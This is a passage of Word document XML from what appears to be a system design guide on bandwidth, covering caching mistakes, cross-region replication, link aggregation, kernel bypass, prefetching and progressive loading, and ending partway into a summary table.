        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Solution: Paginate (20 per page), server-side filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E8A10" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unoptimized media:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574334FE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Serving 4000×3000 pixel images when displayed at 400×300 → 100x more pixels than needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4854E26B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Solution: Responsive images (srcset), image CDN with resize-on-demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7F089F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Not Caching What Should Be Cached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537AAF3A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Every cache miss = bandwidth consumed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A11A77" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53810B44" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Resource served 1,000,000 times/day, 100 KB each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A06D9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Without caching: 100 GB/day of origin bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68056FD2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>With 95% cache hit ratio: 5 GB/day of origin bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339FC5F3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Savings: 95 GB/day = 2.85 TB/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1379BC05" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common caching misses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402EBCE5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cache-Control: no-cache on static assets that rarely change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C11760E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Missing ETag headers (forcing full re-download on every request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EAE143" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Varying on unnecessary headers (fragmenting the cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D08993" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Not using a CDN for static content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183ABC20" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.4 Synchronous Replication Across High-Latency Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204FC46F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Synchronous replication to a remote datacenter (100ms RTT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2FA1A1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each write waits 100ms for remote ACK → max throughput = 1/0.1 = 10 writes/sec (on a single connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51586605" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Even with pipelining, the BDP constraint limits throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474EA110" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E85B516" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Asynchronous replication for cross-region (accept eventual consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A80D167" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Synchronous replication only within the same region (&lt; 2ms RTT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEE300A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Batch multiple writes into single replication messages (amortize RTT cost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5BE62" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="64FBA65E">
          <v:rect id="_x0000_i4384" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D558BC5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Bandwidth Scaling Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DFDA0F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 Horizontal Bandwidth Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD54F4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network link aggregation (LAG/bonding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6570F6DF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Combine multiple physical links into one logical link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BBA7DF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>4 × 10 Gbps = 40 Gbps aggregate bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23EE33" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Traffic is distributed across links using hash-based load balancing (per-flow).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507612B6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>If one link fails, traffic redistributes to remaining links.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB8B771" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-NIC servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35625666" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>One NIC for production traffic (10/25 Gbps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899538F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>One NIC for replication/backup traffic (10 Gbps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2759E2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>One NIC for management (1 Gbps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B01122" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Separates traffic classes, prevents one from starving another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E43FA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service scaling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D2CD1F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Add more service instances → each handles a portion of bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70140F7A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Load balancer distributes → no single instance needs to handle all bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2A6C4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Shared-nothing architecture → each instance's bandwidth requirement = total / N.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E49954" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 Vertical Bandwidth Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADAE31C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Upgrade link speeds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A47A0D6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>1 Gbps → 10 Gbps → 25 Gbps → 100 Gbps → 400 Gbps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F1E84A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each step is a single-interface upgrade (no application changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036941B8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Diminishing returns at extreme speeds (PCIe becomes bottleneck — can't feed a 400 Gbps NIC from a single PCIe slot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AD35B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kernel bypass (DPDK, io_uring):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B4E02" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Standard Linux networking: packet passes through kernel → context switches → memory copies → 10–20 Gbps max per core.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC77A0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>DPDK (Data Plane Development Kit): application directly accesses NIC hardware. No kernel involvement. Can process 100+ Gbps on a single machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2615E0E3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Used by: high-frequency trading, CDN edge servers, network appliances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30611AF0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Content-Aware Bandwidth Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853450D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intelligent prefetching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8CD1B9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Predict what the user will request next → fetch it before they ask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E56836B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Browser hints: &lt;link rel="prefetch" href="next-page.html"&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC7836" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Video streaming: prefetch the next 30 seconds of video into buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C8F60" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Utilizes idle bandwidth (when the link is not at capacity) to reduce future latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003534F7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Progressive loading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D881A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Send the most important data first, less important data later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B12E8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Progressive JPEG: low-quality full image immediately, refine as more data arrives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33311EBD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>HTTP Range requests: load first 100 KB of a video (start playback), fetch rest in background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E74F721" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Database query results: stream first rows immediately (don't wait for complete result set).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839A16D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="252A4016">
          <v:rect id="_x0000_i4385" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2B6EE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Summary — Bandwidth in the System Design Mental Model</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201"/>
        <w:gridCol w:w="7149"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="38ADF62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608441" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dimension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BE8981" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Key Consideration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="1229F4C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C9EDCC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Network bandwidth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B46F98" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Plan for peak burst, not average. Alert at 70% utilization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="7502D9F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A173D3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Memory bandwidth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E5628F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Matters for analytics/caching workloads. Cache hierarchy is key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="1A249F3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71E182" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Storage bandwidth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E4F1FE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>NVMe for latency-sensitive. HDDs only for sequential/archival.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="1FE1A76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FC402C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Cross-region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3686E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Minimize. Compress. Batch. It's expensive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="2165528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E0EF31" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
